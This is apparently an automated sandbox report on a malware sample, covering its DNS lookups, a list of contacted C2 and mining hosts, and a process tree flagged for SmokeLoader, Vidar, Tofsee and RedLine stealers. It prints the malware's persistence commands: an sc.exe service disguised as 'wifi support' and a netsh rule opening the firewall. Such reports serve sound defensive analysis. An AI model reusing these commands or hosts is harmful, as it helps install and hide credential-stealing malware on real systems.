                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:52.014040947 CET8.8.8.8192.168.2.60xba00No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:31:19.102844000 CET8.8.8.8192.168.2.60x2c4bNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • qsmgbhufo.net
                                                                                                                                                                                                              • host-data-coin-11.com
                                                                                                                                                                                                            • asruhu.org
                                                                                                                                                                                                            • jcgov.net
                                                                                                                                                                                                            • obmpjgr.org
                                                                                                                                                                                                            • sstfqxq.net
                                                                                                                                                                                                            • jlldr.org
                                                                                                                                                                                                            • voqqwvg.net
                                                                                                                                                                                                            • lmkns.org
                                                                                                                                                                                                            • data-host-coin-8.com
                                                                                                                                                                                                            • qhgexnr.com
                                                                                                                                                                                                            • yhmjbvbr.net
                                                                                                                                                                                                            • hyjsal.org
                                                                                                                                                                                                            • dgxouben.org
                                                                                                                                                                                                            • bculwb.com
                                                                                                                                                                                                            • unicupload.top
                                                                                                                                                                                                            • qfpwti.com
                                                                                                                                                                                                            • xvnibudur.org
                                                                                                                                                                                                            • wmvxxhaln.net
                                                                                                                                                                                                            • ogoctcljqs.com
                                                                                                                                                                                                            • ioktb.net
                                                                                                                                                                                                            • dukmi.com
                                                                                                                                                                                                            • mcwxjjc.org
                                                                                                                                                                                                            • ohvdekeqkm.org
                                                                                                                                                                                                            • 185.7.214.171:8080
                                                                                                                                                                                                            • mlhkcu.org
                                                                                                                                                                                                            • vevlc.com
                                                                                                                                                                                                            • ohlut.com
                                                                                                                                                                                                            • omhdbkt.net
                                                                                                                                                                                                            • mfconnslgq.com
                                                                                                                                                                                                            • pubhrhxb.com
                                                                                                                                                                                                            • ajgkqwkg.org
                                                                                                                                                                                                            • xrbspm.com
                                                                                                                                                                                                            • epcciphsoh.org
                                                                                                                                                                                                            • tbqbqbxaj.net
                                                                                                                                                                                                            • yedkq.org
                                                                                                                                                                                                            • nekvodf.com
                                                                                                                                                                                                            • ywykfwn.net
                                                                                                                                                                                                            • qfbgcss.net
                                                                                                                                                                                                            • lxjysfgjrh.org
                                                                                                                                                                                                            • qxnyvqdps.net
                                                                                                                                                                                                            • wcdhabii.org
                                                                                                                                                                                                            • ynptmns.com
                                                                                                                                                                                                            • yjoyannoc.org
                                                                                                                                                                                                            • vsnokv.org
                                                                                                                                                                                                            • wlmasccc.com
                                                                                                                                                                                                            • qalbmnobc.org
                                                                                                                                                                                                            • qmvwr.net
                                                                                                                                                                                                            • fhfjy.com
                                                                                                                                                                                                            • krgodthiqk.net
                                                                                                                                                                                                            • fpepckdf.org
                                                                                                                                                                                                            • ovhmquitm.com
                                                                                                                                                                                                            • jbmqdifhe.com
                                                                                                                                                                                                            • a0621298.xsph.ru
                                                                                                                                                                                                            • fkgaaiey.net
                                                                                                                                                                                                            • kebbk.net
                                                                                                                                                                                                            • hoircbi.org
                                                                                                                                                                                                            • aglrl.com
                                                                                                                                                                                                            • ivytp.com
                                                                                                                                                                                                            • rbokhamk.net
                                                                                                                                                                                                            • 185.163.204.22
                                                                                                                                                                                                            • 185.163.204.24
                                                                                                                                                                                                            • molmwvfdsj.org
                                                                                                                                                                                                            • uqmibnvyi.org
                                                                                                                                                                                                            • cmmwfel.org
                                                                                                                                                                                                            • voeiplb.com
                                                                                                                                                                                                            • xivyfkgciu.net
                                                                                                                                                                                                            • ydjicveig.com
                                                                                                                                                                                                            • mtcpl.com

                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            Analysis Process: 0Cjy7Lkv1A.exe PID: 4440 Parent PID: 3036

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:28:25
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\0Cjy7Lkv1A.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:284672 bytes
                                                                                                                                                                                                            MD5 hash:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: 0Cjy7Lkv1A.exe PID: 6452 Parent PID: 4440

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:28:28
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\0Cjy7Lkv1A.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:284672 bytes
                                                                                                                                                                                                            MD5 hash:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: explorer.exe PID: 3440 Parent PID: 6452

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:28:35
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                            Imagebase:0x7ff6f22f0000
                                                                                                                                                                                                            File size:3933184 bytes
                                                                                                                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 6492 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:28:40
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 1520 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:28:52
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 5036 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:07
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: ujhcrda PID: 5724 Parent PID: 936

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:09
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:284672 bytes
                                                                                                                                                                                                            MD5 hash:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: ujhcrda PID: 5416 Parent PID: 5724

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:12
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:284672 bytes
                                                                                                                                                                                                            MD5 hash:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: 60C2.exe PID: 6188 Parent PID: 3440

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:13
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:301056 bytes
                                                                                                                                                                                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 46%, Metadefender, Browse
                                                                                                                                                                                                            • Detection: 77%, ReversingLabs
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 4192 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:16
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: WerFault.exe PID: 5668 Parent PID: 4192

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:16
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: 7063.exe PID: 7052 Parent PID: 3440

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:18
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:327680 bytes
                                                                                                                                                                                                            MD5 hash:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: WerFault.exe PID: 2784 Parent PID: 6188

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:19
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
                                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Analysis Process: A8FB.exe PID: 4692 Parent PID: 3440

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:21
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:313344 bytes
                                                                                                                                                                                                            MD5 hash:2650E6FA017E57264E55CB0078639A13
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            Analysis Process: B3BA.exe PID: 6964 Parent PID: 3440

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:24
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x370000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 7092 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:27
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
                                                                                                                                                                                                            Imagebase:0x2a0000
                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 2968 Parent PID: 7092

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:28
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 3496 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:28
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
                                                                                                                                                                                                            Imagebase:0x2a0000
                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 1312 Parent PID: 3496

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:29
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: sc.exe PID: 3220 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:29
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                                            Imagebase:0x13c0000
                                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 3252 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:29
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5004 Parent PID: 3220

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:30
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: sc.exe PID: 5324 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:31
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
                                                                                                                                                                                                            Imagebase:0x13c0000
                                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5432 Parent PID: 5324

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:31
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: sc.exe PID: 2192 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:32
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\sc.exe" start uuqefjyt
                                                                                                                                                                                                            Imagebase:0x13c0000
                                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6112 Parent PID: 2192

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:32
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: netsh.exe PID: 4388 Parent PID: 4692

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:33
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                            Imagebase:0x9e0000
                                                                                                                                                                                                            File size:82944 bytes
                                                                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

